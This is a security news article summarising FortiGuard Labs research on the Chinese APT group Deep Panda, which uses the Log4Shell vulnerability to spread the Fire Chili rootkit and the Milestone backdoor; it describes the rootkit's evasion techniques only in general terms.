This month, Deep Panda launched new cyberattacks that use Log4Shell to spread the new Fire Chili rootkit. Deep Panda is an advanced persistent threat (APT) hacking group from China with at least ten years of experience. The APT targets government, defense, healthcare, financial institutions, telecommunications, and others for data theft and monitoring.
The Milestone backdoor and the Infoadmin Remote Access Trojan (RAT) based on the Gh0st RAT code are among the dangerous tools used by cybercriminals. Affiliation with Winnti, a distinct Chinese organization known to target game creators and distributors, is also possible. According to FortiGuard Labs researchers, Deep Panda has launched a new campaign aimed at companies in the financial, tourism, and cosmetics industries.
During the last month, FortiGuard discovered the group’s active use of Log4Shell, a significant flaw in the Apache Log4J Java logging library (CVE-2021-44228, CVSS 10.0), to propagate a new, “novel” rootkit. Multiple gangs use Log4Shell to attack VMware Horizon servers for cryptojacking and data exfiltration.
In Deep Panda’s scenario, the new rootkit, nicknamed Fire Chili, is used in conjunction with the Milestone backdoor to keep activities hidden. Fire Chili is signed with a hijacked digital certificate, the same one used by Winnti to sign-off malicious software, and it checks to see if the target PC is in safe mode.
“It then checks the operating system version,” said the researchers. “The rootkit uses Direct Kernel Object Modification (DKOM), which involves undocumented kernel structures and objects, for its operations. For this reason, it relies on specific OS builds as otherwise, it may cause the infected machine to crash.”
Windows 10 Creators Update (Redstone 2) is the most recent supported version. Drivers are used for masking harmful things from security mechanisms already in place. The rootkit also tampers with the registry to prevent malicious processes from being terminated, and it generates a callback to hide newly-created processes from programs such as Task Manager.
The researchers obtained four samples of different drivers, both 32-bit and 64-bit, composed in 2017. The samples were signed using stolen certificates from gambling firms in the United States and Korea. The malware can also conceal registry keys and TCP network connections. The Milestone backdoor is then deployed on the target system to allow for persistent data theft. The researchers also uncovered a dropper carrying a Milestone loader.